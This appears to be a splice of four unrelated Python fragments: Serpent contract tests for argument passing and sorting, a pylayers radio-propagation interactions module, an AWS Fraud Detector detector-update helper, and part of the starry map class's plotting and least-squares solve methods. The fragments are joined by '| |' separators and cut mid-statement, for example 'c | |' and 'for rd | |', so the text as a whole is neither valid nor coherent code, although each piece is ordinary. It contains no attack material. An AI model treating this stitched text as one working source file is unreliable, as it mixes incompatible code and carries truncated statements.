def argcall(args:a):
return(args[0] + args[1] * 10 + args[2] * 100)
def argkall(args:a):
return self.argcall(args)
"""
def test_argcall():
s = tester.state()
c = s.contract(basic_argcall_code)
assert [375] == s.send(tester.k0, c, 0, funid=0, abi=[[5, 7, 3]])
assert [376] == s.send(tester.k0, c, 0, funid=1, abi=[[6, 7, 3]])
more_complex_argcall_code = """
def argcall(args:a):
args[0] *= 2
args[1] *= 2
return(args:a)
def argkall(args:a):
return(self.argcall(args, outsz=2):a)
"""
def test_argcall2():
s = tester.state()
c = s.contract(more_complex_argcall_code)
assert [4, 8] == s.send(tester.k0, c, 0, funid=0, abi=[[2, 4]])
assert [6, 10] == s.send(tester.k0, c, 0, funid=1, abi=[[3, 5]])
sort_code = """
def sort(args:a):
if len(args) < 2:
return(args:a)
h = array(len(args))
hpos = 0
l = array(len(args))
lpos = 0
i = 1
while i < len(args):
if args[i] < args[0]:
l[lpos] = args[i]
lpos += 1
else:
h[hpos] = args[i]
hpos += 1
i += 1
shrink(h, hpos)
shrink(l, lpos)
h = self.sort(h, outsz=hpos)
l = self.sort(l, outsz=lpos)
o = array(len(args))
i = 0
while i < lpos:
o[i] = l[i]
i += 1
o[lpos] = args[0]
i = 0
while i < hpos:
o[lpos + 1 + i] = h[i]
i += 1
return(o:a)
"""
def test_sort():
s = tester.state()
c = s.contract(sort_code)
a1 = s.send(tester.k0, c, 0, funid=0, abi=[[9]])
assert a1 == [9]
a2 = s.send(tester.k0, c, 0, funid=0, abi=[[9, 5]])
assert a2 == [5, 9]
a3 = s.send(tester.k0, c, 0, funid=0, abi=[[9, 3, 5]])
assert a3 == [3, 5, 9]
a4 = s.send(tester.k0, c, 0, funid=0, abi=[[80, 24, 234, 112, 112, 29]])
assert a4 == [24, 29, 80, 112, 112, 234]
filename9 = "mul2_qwertyuioplkjhgfdsabarbar.se"
sort_tester_code = \
'''
extern sorter: [sort:a]
data sorter
def init():
self.sorter = create("%s")
def test(args:a):
return(self.sorter.sort(args, outsz=len(args)):a)
''' % filename9
def test_indirect_sort():
s = tester.state()
open(filename9, 'w').write(sort_code)
c = s.contract(sort_tester_code)
a1 = s.send(tester.k0, c, 0, funid=0, abi=[[80, 24, 234, 112, 112, 29]])
assert a1 == [24, 29, 80, 112, 112, 234]
multiarg_code = """
def kall(a:a, b, c:a, d:s, e):
x = a[0] + 10 * b + 100 * c[0] + 1000 * a[1] + 10000 * c[1] + 100000 * e
return([x, getch(d, 0) + getch(d, 1) + getch(d, 2), len(d)]:a)
"""
def test_multiarg_code():
s = tester.state()
c | |
#!/usr/bin/python
# -*- coding: utf8 -*-
from __future__ import print_function
"""
.. currentmodule:: pylayers.antprop.interactions
.. autosummary::
:members:
"""
import doctest
import os
import sys
import glob
import pdb
import doctest
if sys.version_info.major==2:
import ConfigParser
else:
import configparser
import networkx as nx
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import struct as stru
import pylayers.util.geomutil as geu
import pylayers.util.pyutil as pyu
from pylayers.util.project import *
from pylayers.antprop.slab import *
from pylayers.antprop.diffRT import *
class Inter(PyLayers):
""" Interactions
Meta class of interactions ( Interactions, IntB/IntL/IntT/intR/intD)
Attributes
----------
typ : int
type of interaction
1 : D
2 : R
3 : T
0 : Tx or Rx
-1 : B
data: np.array
data for the interaction
idx:
idx number of the interaction between 0 and (ray number * inter number)
fGHz : np.array
frequency range in GHz
nf : int
number of step into freq range
olf : np.array
np.ones((nf)) used for broadcasting
"""
def __init__(self,
typ=0,
data=np.array(()),
idx=[],
_filemat='matDB.ini',
_fileslab='slabDB.ini',
slab={}):
""" Inter object constructor
Parameters
----------
typ : int
data : ndarray
idx : list
_filemat : string
_fileslab : string
slab : SlabDB
"""
self.typ = typ
self.data = data
self.idx = idx
if slab=={}:
self.slab = SlabDB(filemat=_filemat, fileslab=_fileslab)
else:
self.slab = slab
self.idx = []
if idx != []:
self.idx.append(idx)
self.E = np.eye(2)
def __repr__(self):
if self.evaluated:
s = self.T.__repr__()
s = s + '\n' + self.R.__repr__()
s = s + '\n'+ self.D.__repr__()
return s
else:
return 'I not yet evaluated'
def create_dusl(self,a):
""" create dictionnary of used slab.
Parameters
----------
a : np.array of strings which contains ordered interactions
ordered as in self.idx/self.data
"""
for s in self.dusl:
self.dusl[s]=np.where(a==s)[0]
def sinsout(self):
""" calculate sin sout of the interaction
Notes
-----
typ
1 : Diffraction
2 : Reflection
3 : Transmission
si : self.data[:,1]
so : self.data[:,2]
typ = 0
LOS
typ = -1
Basis
"""
if self.typ in [2, 3]: #reflection & transmission
self.si0 = self.data[:, 1]
self.sout = self.data[:, 2]
elif self.typ == 1: # diffraction
self.si0 = self.data[:, 4]
self.sout = self.data[:, 5]
elif self.typ == 0: # loss
self.sout = self.data[0]
elif self.typ == -1: # B
self.sout = np.zeros((len(self.data[:, 0])))
def stack(self, data=np.array(()), idx=0, isdata=True):
""" stack data and the associated idx
Parameters
----------
data : np.array()
data to stack
idx :
index to stack
isdata: bool
False if you just want to stack idx (only used for intE class )
Examples
--------
>>> from pylayers.antprop.rays import *
>>> import numpy as np
>>> I=Inter()
>>> data = np.array(([3,4,5]))
>>> idx = 0
>>> I.stack(data,idx)
>>> I.data
array([3, 4, 5])
>>> I.idx
[0]
>>> data = np.array(([3,4,5],[7,8,9]))
>>> idx = [1,2]
>>> I.stack(data,idx)
>>> I.data
array([[3, 4, 5],
[3, 4, 5],
[7, 8, 9]])
>>> I.idx
[0, 1, 2]
"""
if isinstance(idx, int):
try:
if isdata:
self.data = np.vstack((self.data, data))
self.idx.append(idx)
except:
if self.idx == []:
if isdata:
self.data = data
self.idx = [idx]
else:
raise NameError('Issue in Inter.stack')
elif isinstance(idx, list) or isinstance(idx, np.ndarray):
try:
self.data = np.vstack((self.data,data))
except:
self.data=data
self.idx.extend(idx)
# for ii, idx in enumerate(idx):
# if isdata:
# try:
# self.data = np.vstack((self.data, data[ii]))
# except:
# self.data = data[ii]
# self.idx.append(idx)
class Interactions(Inter,dict):
""" Interaction parameters
gather all type of interactions (IntB/L/R/T)
Methods
-------
add(self,li): add a list of basis interactions
addi(self,i): add a single interaction
eval(self) : evaluate all the interactions added thanks to self.add or self.addi
and create the self.I which gather all thoses interactions
5 following types of interactions
B : local basis transformation matrix (unitary)
L : LOS case
R : Reflection
T : Transmission
D : Diffraction
"""
def __init__(self,slab={}):
""" object constructor
"""
Inter.__init__(self,slab=slab)
self['B'] = []
self['L'] = []
self[''] = []
self['T'] = []
self['D'] = []
self.evaluated = False
self.nimax = 0
def add(self, li):
""" add a list of interactions
Parameters
----------
li : list
list of interactions
"""
# determine the total number of interactions
for i in li:
if i.idx != []:
self.nimax = max(self.nimax,max((i.idx)))+1
for i in li:
self.addi(i)
def addi(self, i):
""" add interactions into Interactions class
Parameters
----------
i : Inter object
"""
if not isinstance(self.typ, np.ndarray):
self.typ = np.zeros((self.nimax), dtype=str)
if i.typ == -1:
self.B = i
self['B'] = i.idx
self.typ[i.idx] = 'B'
if i.typ == 0:
self.L = i
self['L'] = i.idx
self.typ[i.idx] = 'L'
if i.typ == 1:
self.D = i
self['D'] = i.idx
self.typ[i.idx] = 'D'
if i.typ == 2:
self.R = i
self['R'] = i.idx
self.typ[i.idx] = 'R'
if i.typ == 3:
self.T = i
self['T'] = i.idx
self.typ[i.idx] = 'T'
def eval(self,fGHz=np.array([2.4])):
""" evaluate all the interactions
Parameters
----------
fGHz : np.array()
Notes
-----
self.I : np.shape(self.I) = (self.nf,self.nimax,2,2)
with self.nf : number of frequences
self.nimax : the total number of interactions ( of all rays)
self.sout :
distance from one interaction to the next one
self.si0 :
distance from the previous interaction to the one
self.alpha :
alpha as described in JFL Thesis
self.gamma :
!! gamma**2 !!! (squared included) as described
"""
# Initialize the global I matrix which gathers all interactions
# into a single np.array
# f x i x 2 x 2
self.fGHz = fGHz
self.nf = len(fGHz)
self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)
self.sout = np.zeros((self.nimax))
self.si0 = np.zeros((self.nimax))
self.alpha = np.ones((self.nimax), dtype=complex)
self.gamma = np.ones((self.nimax), dtype=complex)
# evaluate B and fill I
#OUT DATED , B MDA are stored outside of I
# try:
# self.I[:, self.B.idx, :, :] = self.B.eval(fGHz=fGHz)
# self.sout[self.B.idx] = self.B.sout
# self.si0[self.B.idx] = self.B.si0
# except:
# print 'Warning : No B interaction Evaluated'
# evaluate L and fill I
# OUT DATED , Los interaction is managed oustside of I
# try:
# self.I[:, self.L.idx, :, :] = self.L.eval(fGHz=fGHz)
# self.sout[self.L.idx] = self.L.sout
# self.si0[self.L.idx] = self.L.si0
# except:
# print 'Warning : No L interaction Evaluated'
# evaluate R and fill I
if len(self.R.data)!=0:
#try:
self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)
self.sout[self.R.idx] = self.R.sout
self.si0[self.R.idx] = self.R.si0
self.alpha[self.R.idx] = self.R.alpha
self.gamma[self.R.idx] = self.R.gamma
#except:
# print Warning('Warning Interaction.eval: No R interaction Evaluated,\ whereas Reflection rays found')
# pdb.set_trace()
# evaluate T and fill I
if len(self.T.data)!=0:
#try:
self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)
self.sout[self.T.idx] = self.T.sout
self.si0[self.T.idx] = self.T.si0
self.alpha[self.T.idx] = self.T.alpha
self.gamma[self.T.idx] = self.T.gamma
#except:
# print Warning('Warning Interaction.eval: No T interaction Evaluated,\ whereas Transmission rays found')
# pdb.set_trace()
# evaluate D and fill I
if len(self.D.data)!=0:
#try:
self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)
self.sout[self.D.idx] = self.D.sout
self.si0[self.D.idx] = self.D.si0
# self.alpha[self.D.idx] = self.D.alpha
# self.gamma[self.D.idx] = self.D.gamma
#except:
# print Warning('Warning Interaction.eval: No D interaction Evaluated,\ whereas Diffraction rays found')
# pdb.set_trace()
self.evaluated = True
class IntB(Inter):
""" Local Basis interaction class
Basis interactions
Attributes
----------
data : np.array:
WARNING np.shape(data) = (ninter x 4)
the input matrix 2x2 is reshaped as 1x 4
idx : list
index of the corresponding ray and interaction
Methods
-------
eval : evaluation of B interaction
Notes
-----
The interaction object is np.array with shape (nf,ninter 2, 2)
"""
def __init__(self, data=np.array(()), idx=[],slab={}):
Inter.__init__(self, data=data, idx=idx, typ=-1,slab=slab)
def __repr__(self):
s = 'number of B basis :' + str(np.shape(self.data)[0])
return s
def eval(self,fGHz=np.array([2.4])):
""" evaluation of B interactions
Parameters
----------
fGHz : np.array()nn
frequency range
Returns
-------
self.data
Examples
--------
>>> from pylayers.antprop.rays import *
>>> M = np.eye(2).reshape(4)
>>> B = IntB(M,0)
>>> B.data
array([ 1., 0., 0., 1.])
>>> B.stack(M,1)
>>> B.data
array([[ 1., 0., 0., 1.],
[ 1., 0., 0., 1.]])
>>> eB=B.eval()
>>> nf = B.nf
>>> ninter = len(B.idx)
>>> np.shape(eB)
(1, 2, 2, 2)
"""
self.fGHz = fGHz
self.nf = len(fGHz)
self.sinsout()
if len(self.data) != 0:
lidx = len(self.idx)
data = self.data.reshape(lidx, 3, 3)
#return(self.olf[:, np.newaxis, np.newaxis, np.newaxis]*data[np.newaxis, :, :, :])
return(np.ones((len(fGHz),1,1,1))*data[None, :, :, :])
else:
print('no B interactions to evaluate')
return(self.data[:, None, None, None])
#####Interaction Loss in not used for speed purpose
#the loss interaction is computed and added after the global computation
# class | |
<filename>aws-frauddetector-detector/src/aws_frauddetector_detector/helpers/update_worker_helpers.py
import logging
from typing import Tuple, Set
from cloudformation_cli_python_lib import (
exceptions,
)
from . import validation_helpers, api_helpers, common_helpers, model_helpers, util
from .. import models
# Use this logger to forward log messages to CloudWatch Logs.
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.DEBUG)
DRAFT_STATUS = "DRAFT"
def validate_dependencies_for_detector_update(
afd_client, model: models.ResourceModel, previous_model: models.ResourceModel
):
# TODO: revisit this validation when/if we support in-place teardown
# For now, throw bad request for unsupported event type update, and validate external models + model versions
# (Other updates that would require teardown will throw exception and trigger rollback)
if model.EventType.Name != previous_model.EventType.Name:
raise exceptions.InvalidRequest(f"Error: EventType.Name update is not allowed")
if model.EventType.Inline != previous_model.EventType.Inline:
raise exceptions.InvalidRequest(f"Error: EventType.Inline update is not allowed")
if not model.EventType.Inline:
event_type_name = util.extract_name_from_arn(model.EventType.Arn)
(
get_event_types_succeeded,
_,
) = validation_helpers.check_if_get_event_types_succeeds(afd_client, event_type_name)
if not get_event_types_succeeded:
raise exceptions.NotFound("detector.EventType", event_type_name)
validation_helpers.validate_external_models_for_detector_model(afd_client, model)
validation_helpers.validate_model_versions_for_detector_model(afd_client, model)
def update_rules_and_inline_outcomes_for_detector_update(
afd_client, model: models.ResourceModel, previous_model: models.ResourceModel
) -> (Set[Tuple[str, str]], Set[str]):
# build list of kept rules, unused rules & new rules
previous_rules_by_rule_id = {r.RuleId: r for r in previous_model.Rules}
current_rules_by_rule_id = {r.RuleId: r for r in model.Rules}
# get list of outcomes and rule versions to delete
(unused_rule_versions, unused_inline_outcomes,) = _get_unused_rule_versions_and_inline_outcomes(
afd_client=afd_client,
detector_id=model.DetectorId,
previous_rules_by_rule_id=previous_rules_by_rule_id,
current_rules_by_rule_id=current_rules_by_rule_id,
)
# create new inline outcomes and rules
new_rule_versions_by_rule_id = _create_new_inline_outcomes_and_rules(
afd_client=afd_client,
detector_id=model.DetectorId,
previous_rules_by_rule_id=previous_rules_by_rule_id,
current_rules_by_rule_id=current_rules_by_rule_id,
)
# update persisting rules and rule artifacts (inline outcomes, rule versions)
(
rule_versions_to_delete,
inline_outcomes_to_delete,
persisting_rule_versions_by_rule_id,
) = _update_persisting_rules(
afd_client=afd_client,
detector_id=model.DetectorId,
previous_rules_by_rule_id=previous_rules_by_rule_id,
current_rules_by_rule_id=current_rules_by_rule_id,
)
# update model to include rule version for rules
LOG.debug(f"updating rule models: {model.Rules} with rule versions by rule id {new_rule_versions_by_rule_id}")
new_rule_versions_by_rule_id.update(persisting_rule_versions_by_rule_id)
for rule_model in model.Rules:
if rule_model.RuleId in new_rule_versions_by_rule_id:
rule_model.RuleVersion = new_rule_versions_by_rule_id.get(rule_model.RuleId)
LOG.debug(f"updated rule models: {model.Rules}")
# update unused rule versions and inline outcomes from persisting rules
unused_rule_versions.update(rule_versions_to_delete)
unused_inline_outcomes.update(inline_outcomes_to_delete)
# return rules and outcomes to delete (need to delete after updating detector version)
return unused_rule_versions, unused_inline_outcomes
def update_detector_version_for_detector_update(
afd_client, model: models.ResourceModel, previous_model: models.ResourceModel
) -> Set[Tuple[str, str]]:
# update detector version - create if previous is not draft
# update tags
# return set of unused detector versions (tuple: detector_id, detector_version_id)
desired_rules = []
for rule_model in model.Rules:
rule_dict = {
"detectorId": model.DetectorId,
"ruleId": rule_model.RuleId,
"ruleVersion": rule_model.RuleVersion, # rule version needs to be set before this
}
desired_rules.append(rule_dict)
external_models = model_helpers.get_external_model_endpoints_from_model(model)
model_versions = model_helpers.get_model_versions_from_model(model)
if previous_model.DetectorVersionStatus != DRAFT_STATUS:
LOG.info("previous detector version status was not DRAFT. creating a new detector version")
api_helpers.call_create_detector_version(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
rules=desired_rules,
rule_execution_mode=model.RuleExecutionMode,
model_versions=model_versions,
external_model_endpoints=external_models,
detector_version_description=model.Description,
detector_version_tags=model_helpers.get_tags_from_tag_models(model.Tags),
)
else:
LOG.info("previous detector version status was DRAFT. updating detector version in place")
api_helpers.call_update_detector_version(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
detector_version_id=model.DetectorVersionId,
rules=desired_rules,
rule_execution_mode=model.RuleExecutionMode,
model_versions=model_versions,
external_model_endpoints=external_models,
detector_version_description=model.Description,
)
# get arn of max version detector version in order to update tags and model
describe_detector_response = api_helpers.call_describe_detector(afd_client, model.DetectorId)
dv_summaries = describe_detector_response.get("detectorVersionSummaries", [])
dv_ids = [summary.get("detectorVersionId", "-1") for summary in dv_summaries]
max_dv_id = str(max([int(dv_id) for dv_id in dv_ids]))
model.DetectorVersionId = max_dv_id
if previous_model.DetectorVersionStatus == DRAFT_STATUS:
LOG.info("previous detector version status was DRAFT. updating tags separately")
# update dv does not update tags, so update tags in this case
get_dv_response = api_helpers.call_get_detector_version(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
detector_version_id=max_dv_id,
)
latest_dv_arn = get_dv_response.get("arn", None)
common_helpers.update_tags(
frauddetector_client=afd_client,
afd_resource_arn=latest_dv_arn,
new_tags=model.Tags,
)
if model.DetectorVersionStatus != DRAFT_STATUS:
LOG.info(f"desired status is not DRAFT. updating detector version status: {model.DetectorVersionStatus}")
api_helpers.call_update_detector_version_status(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
detector_version_id=max_dv_id,
status=model.DetectorVersionStatus,
)
dvs_to_delete = set()
new_describe_detector_response = api_helpers.call_describe_detector(afd_client, model.DetectorId)
updated_dv_summaries = new_describe_detector_response.get("detectorVersionSummaries", [])
LOG.info(f"updated detector version summaries: {updated_dv_summaries}")
for summary in updated_dv_summaries:
dv_id = summary.get("detectorVersionId", "-1")
dv_status = summary.get("status", "ACTIVE")
if dv_id == max_dv_id or dv_status == "ACTIVE":
continue
dvs_to_delete.add((model.DetectorId, dv_id))
LOG.info(f"detector versions to delete: {dvs_to_delete}")
return dvs_to_delete
def delete_unused_detector_versions_for_detector_update(afd_client, unused_detector_versions: Set[Tuple[str, str]]):
for detector_id, detector_version_id in unused_detector_versions:
api_helpers.call_delete_detector_version(
frauddetector_client=afd_client,
detector_id=detector_id,
detector_version_id=detector_version_id,
)
def delete_unused_rules_for_detector_update(afd_client, detector_id: str, unused_rule_versions: Set[Tuple[str, str]]):
# For now, just catch conditional check failed exception, which means the rule is still used.
# We will follow up with a more optimal approach (and avoid the try/catch)
for unused_rule_id, unused_rule_version in unused_rule_versions:
try:
api_helpers.call_delete_rule(
frauddetector_client=afd_client,
detector_id=detector_id,
rule_id=unused_rule_id,
rule_version=unused_rule_version,
)
except afd_client.exceptions.ConflictException as conflictException:
LOG.warning(
f"Conflict exception when deleting rule! Continuing without failure. "
f"This is likely from a rule being present in an active detector version. "
f"This can happen when transitioning from ACTIVE -> DRAFT, and keeping the ACTIVE version. "
f"Exception: {conflictException}"
)
def delete_unused_inline_outcomes_for_detector_update(afd_client, unused_inline_outcome_names: Set[str]):
for unused_outcome_name in unused_inline_outcome_names:
api_helpers.call_delete_outcome(frauddetector_client=afd_client, outcome_name=unused_outcome_name)
def validate_dependencies_for_inline_event_type_update(
afd_client,
event_type_model: models.EventType,
previous_event_type_model: models.EventType,
):
# TODO: revisit this validation when/if we support in-place teardown
# is_teardown_required = _determine_if_teardown_is_required(afd_client, model, previous_model)
# if is_teardown_required and not model.AllowTeardown:
# raise RuntimeError(TEARDOWN_CONFLICT_MESSAGE)
_validate_event_variables_for_event_type_update(afd_client, event_type_model, previous_event_type_model)
_validate_entity_types_for_event_type_update(afd_client, event_type_model, previous_event_type_model)
_validate_labels_for_event_type_update(afd_client, event_type_model, previous_event_type_model)
def update_inline_event_type(
afd_client,
event_type_model: models.EventType,
previous_event_type_model: models.EventType,
):
# NOTE: we've already done validation in `validate_dependencies_for_detector_update`
# In the future, we might want to move some event type specific validation here instead.
model_helpers.put_event_type_for_event_type_model(
frauddetector_client=afd_client, event_type_model=event_type_model
)
# if there is no difference in tags, we're done
if event_type_model.Tags == previous_event_type_model.Tags:
return
# update tags separately, for which we need Arn. get the eventtype we just updated to get arn
(get_event_types_worked, get_event_types_response,) = validation_helpers.check_if_get_event_types_succeeds(
frauddetector_client=afd_client, event_type_to_check=event_type_model.Name
)
# this should never happen, but throw internal failure if it does
if not get_event_types_worked:
error_message = f"Updating inline event type {event_type_model.Name}, but no event type exists!!!"
LOG.error(error_message)
raise exceptions.InternalFailure(error_message)
# get arn and update tags
event_type_arn = get_event_types_response.get("eventTypes")[0].get("arn", None)
common_helpers.update_tags(
frauddetector_client=afd_client,
afd_resource_arn=event_type_arn,
new_tags=event_type_model.Tags,
)
def _get_unused_rule_versions_and_inline_outcomes(
afd_client,
detector_id: str,
previous_rules_by_rule_id: dict,
current_rules_by_rule_id: dict,
) -> (Set[str], Set[str]):
unused_rule_versions = set()
unused_inline_outcomes = set()
unused_rule_ids = [
rule_id for rule_id in previous_rules_by_rule_id.keys() if rule_id not in current_rules_by_rule_id
]
# build list of outcomes and rule versions to delete
for unused_rule_id in unused_rule_ids:
unused_rule_model: models.Rule = previous_rules_by_rule_id[unused_rule_id]
# outcomes to delete
outcomes_to_delete = {outcome.Name for outcome in unused_rule_model.Outcomes if outcome.Inline}
unused_inline_outcomes.update(outcomes_to_delete)
# rule versions to delete
get_rules_response = api_helpers.call_get_rules(
frauddetector_client=afd_client,
detector_id=detector_id,
rule_id=unused_rule_id,
)
rule_details = get_rules_response.get("ruleDetails", [])
rule_versions_to_delete = {(rd.get("ruleId", None), rd.get("ruleVersion", None)) for rd in rule_details}
unused_rule_versions.update(rule_versions_to_delete)
return unused_rule_versions, unused_inline_outcomes
def _create_new_inline_outcomes_and_rules(
afd_client,
detector_id: str,
previous_rules_by_rule_id: dict,
current_rules_by_rule_id: dict,
):
# build list of new rules (and new inline outcomes) to create
outcomes_to_create = {}
rules_to_create = {}
new_rule_ids = [rule_id for rule_id in current_rules_by_rule_id.keys() if rule_id not in previous_rules_by_rule_id]
for new_rule_id in new_rule_ids:
new_rule_model: models.Rule = current_rules_by_rule_id[new_rule_id]
outcomes_to_create.update({outcome.Name: outcome for outcome in new_rule_model.Outcomes if outcome.Inline})
rules_to_create.update({new_rule_model.RuleId: new_rule_model})
# create new inline outcomes and new rules
_create_new_inline_outcomes(afd_client, outcomes_to_create)
return _create_new_rules(afd_client, detector_id, rules_to_create)
def _create_new_inline_outcomes(afd_client, outcomes_to_create: dict):
for outcome_name, outcome_model in outcomes_to_create.items():
tags = model_helpers.get_tags_from_tag_models(outcome_model.Tags)
api_helpers.call_put_outcome(
frauddetector_client=afd_client,
outcome_name=outcome_name,
outcome_tags=tags,
outcome_description=outcome_model.Description,
)
def _create_new_rules(afd_client, detector_id: str, rules_to_create: dict) -> dict:
new_rule_versions_by_rule_id = {}
for rule_id, rule_model in rules_to_create.items():
tags = model_helpers.get_tags_from_tag_models(rule_model.Tags)
rule_outcomes = [outcome.Name for outcome in rule_model.Outcomes]
create_rule_response = api_helpers.call_create_rule(
frauddetector_client=afd_client,
rule_id=rule_id,
detector_id=detector_id,
rule_expression=rule_model.Expression,
rule_language=rule_model.Language,
rule_outcomes=rule_outcomes,
rule_description=rule_model.Description,
rule_tags=tags,
)
new_rule_versions_by_rule_id[rule_id] = create_rule_response.get("rule", {}).get("ruleVersion", None)
return new_rule_versions_by_rule_id
def _update_persisting_rules(
afd_client,
detector_id: str,
previous_rules_by_rule_id: dict,
current_rules_by_rule_id: dict,
) -> (Set[Tuple[str, str]], Set[str], dict):
unused_rule_versions = set()
unused_inline_outcomes = set()
persisting_rule_versions_by_rule_id = dict()
persisting_rule_ids = previous_rules_by_rule_id.keys() & current_rules_by_rule_id.keys()
for persisting_rule_id in persisting_rule_ids:
current_rule_model: models.Rule = current_rules_by_rule_id[persisting_rule_id]
previous_rule_model: models.Rule = previous_rules_by_rule_id[persisting_rule_id]
(
rule_versions_to_delete,
inline_outcomes_to_delete,
persisting_rule_version_by_rule_id,
) = _update_persisting_rule(afd_client, detector_id, current_rule_model, previous_rule_model)
unused_rule_versions.update(rule_versions_to_delete)
unused_inline_outcomes.update(inline_outcomes_to_delete)
persisting_rule_versions_by_rule_id.update(persisting_rule_version_by_rule_id)
return (
unused_rule_versions,
unused_inline_outcomes,
persisting_rule_versions_by_rule_id,
)
def _update_persisting_rule(
afd_client,
detector_id: str,
current_rule_model: models.Rule,
previous_rule_model: models.Rule,
) -> (Set[Tuple[str, str]], Set[str], dict):
# check new outcomes vs old outcomes
previous_outcomes_by_name = {outcome.Name: outcome for outcome in previous_rule_model.Outcomes}
current_outcomes_by_name = {outcome.Name: outcome for outcome in current_rule_model.Outcomes}
unused_inline_outcome_names = {
outcome_name
for outcome_name, outcome in previous_outcomes_by_name.items()
if outcome_name not in current_outcomes_by_name and outcome.Inline
}
outcomes_to_update = {
outcome_name: outcome
for outcome_name, outcome in current_outcomes_by_name.items()
if outcome_name not in unused_inline_outcome_names and outcome.Inline
}
# new outcome model will not have Arn, as Arn is readonly for inline outcomes
existing_outcome_models = model_helpers.get_outcomes_model_for_given_outcome_names(
frauddetector_client=afd_client,
outcome_names=outcomes_to_update.keys(),
reference_outcome_names=set(),
)
for existing_outcome in existing_outcome_models:
desired_outcome_model = outcomes_to_update[existing_outcome.Name]
new_tags = model_helpers.get_tags_from_tag_models(desired_outcome_model.Tags)
api_helpers.call_put_outcome(
frauddetector_client=afd_client,
outcome_name=desired_outcome_model.Name,
outcome_description=desired_outcome_model.Description,
)
# use arn from existing outcome model to update tags
common_helpers.update_tags(
frauddetector_client=afd_client,
afd_resource_arn=existing_outcome.Arn,
new_tags=new_tags,
)
# rather than check all the differences, we can just update rule version and call it a day
# first, we need to get rules and grab latest version, since it's not anywhere
get_rules_response = api_helpers.call_get_rules(
frauddetector_client=afd_client,
detector_id=detector_id,
rule_id=current_rule_model.RuleId,
)
rule_details = get_rules_response.get("ruleDetails", [])
rule_versions = [int(rd.get("ruleVersion", "-1")) for rd | |
else:
if (file is not None) and (file != ""):
if (
not self.__props__["limbdarkened"]
and projection == STARRY_ORTHOGRAPHIC_PROJECTION
):
fig.subplots_adjust(
left=0.01, right=0.99, bottom=0.01, top=0.99
)
fig.savefig(file, bbox_inches="tight")
if not custom_ax:
plt.close()
elif not custom_ax:
plt.show()
# Check for invalid kwargs
kwargs.pop("point", None)
kwargs.pop("model", None)
if self.__props__["rv"]:
kwargs.pop("rv", None)
if not self.__props__["limbdarkened"]:
kwargs.pop("projection", None)
if self.__props__["reflected"]:
kwargs.pop("xs", None)
kwargs.pop("ys", None)
kwargs.pop("zs", None)
self._check_kwargs("show", kwargs)
def limbdark_is_physical(self):
"""Check whether the limb darkening profile (if any) is physical.
This method uses Sturm's theorem to ensure that the limb darkening
intensity is positive everywhere and decreases monotonically toward
the limb.
Returns:
bool: Whether or not the limb darkening profile is physical.
"""
result = self.ops.limbdark_is_physical(self.u)
if self.lazy:
return result
else:
return bool(result)
def set_data(self, flux, C=None, cho_C=None):
"""Set the data vector and covariance matrix.
This method is required by the :py:meth:`solve` method, which
analytically computes the posterior over surface maps given a
dataset and a prior, provided both are described as multivariate
Gaussians.
Args:
flux (vector): The observed light curve.
C (scalar, vector, or matrix): The data covariance. This may be
a scalar, in which case the noise is assumed to be
homoscedastic, a vector, in which case the covariance
is assumed to be diagonal, or a matrix specifying the full
covariance of the dataset. Default is None. Either `C` or
`cho_C` must be provided.
cho_C (matrix): The lower Cholesky factorization of the data
covariance matrix. Defaults to None. Either `C` or
`cho_C` must be provided.
"""
self._flux = self._math.cast(flux)
self._C = self._linalg.Covariance(C, cho_C, N=self._flux.shape[0])
def set_prior(self, *, mu=None, L=None, cho_L=None):
"""Set the prior mean and covariance of the spherical harmonic coefficients.
This method is required by the :py:meth:`solve` method, which
analytically computes the posterior over surface maps given a
dataset and a prior, provided both are described as multivariate
Gaussians.
Note that the prior is placed on the **amplitude-weighted** coefficients,
i.e., the quantity ``x = map.amp * map.y``. Because the first spherical
harmonic coefficient is fixed at unity, ``x[0]`` is
the amplitude of the map. The actual spherical harmonic coefficients
are given by ``x / map.amp``.
This convention allows one to linearly fit for an arbitrary map normalization
at the same time as the spherical harmonic coefficients, while ensuring
the ``starry`` requirement that the coefficient of the :math:`Y_{0,0}`
harmonic is always unity.
Args:
mu (scalar or vector): The prior mean on the amplitude-weighted
spherical harmonic coefficients. Default is `1.0` for the
first term and zero for the remaining terms. If this is a vector,
it must have length equal to :py:attr:`Ny`.
L (scalar, vector, or matrix): The prior covariance. This may be
a scalar, in which case the covariance is assumed to be
homoscedastic, a vector, in which case the covariance
is assumed to be diagonal, or a matrix specifying the full
prior covariance. Default is None. Either `L` or
`cho_L` must be provided.
cho_L (matrix): The lower Cholesky factorization of the prior
covariance matrix. Defaults to None. Either `L` or
`cho_L` must be provided.
"""
if mu is None:
mu = np.zeros(self.Ny)
mu[0] = 1.0
mu = self._math.cast(mu)
self._mu = self._math.cast(mu) * self._math.cast(np.ones(self.Ny))
self._L = self._linalg.Covariance(L, cho_L, N=self.Ny)
def remove_prior(self):
"""Remove the prior on the map coefficients."""
self._mu = None
self._L = None
def solve(self, *, design_matrix=None, **kwargs):
"""Solve the linear least-squares problem for the posterior over maps.
This method solves the generalized least squares problem given a
light curve and its covariance (set via the :py:meth:`set_data` method)
and a Gaussian prior on the spherical harmonic coefficients
(set via the :py:meth:`set_prior` method). The map amplitude and
coefficients are set to the maximum a posteriori (MAP) solution.
Args:
design_matrix (matrix, optional): The flux design matrix, the
quantity returned by :py:meth:`design_matrix`. Default is
None, in which case this is computed based on ``kwargs``.
kwargs (optional): Keyword arguments to be passed directly to
:py:meth:`design_matrix`, if a design matrix is not provided.
Returns:
A tuple containing the posterior mean for the amplitude-weighted \
spherical harmonic coefficients (a vector) and the Cholesky factorization \
of the posterior covariance (a lower triangular matrix).
.. note::
Users may call :py:meth:`draw` to draw from the
posterior after calling this method.
"""
# Not implemented for spectral
self._no_spectral()
if self._flux is None or self._C is None:
raise ValueError("Please provide a dataset with `set_data()`.")
elif self._mu is None or self._L is None:
raise ValueError("Please provide a prior with `set_prior()`.")
# Get the design matrix & remove any amplitude weighting
if design_matrix is None:
design_matrix = self.design_matrix(**kwargs)
X = self._math.cast(design_matrix)
# Compute the MAP solution
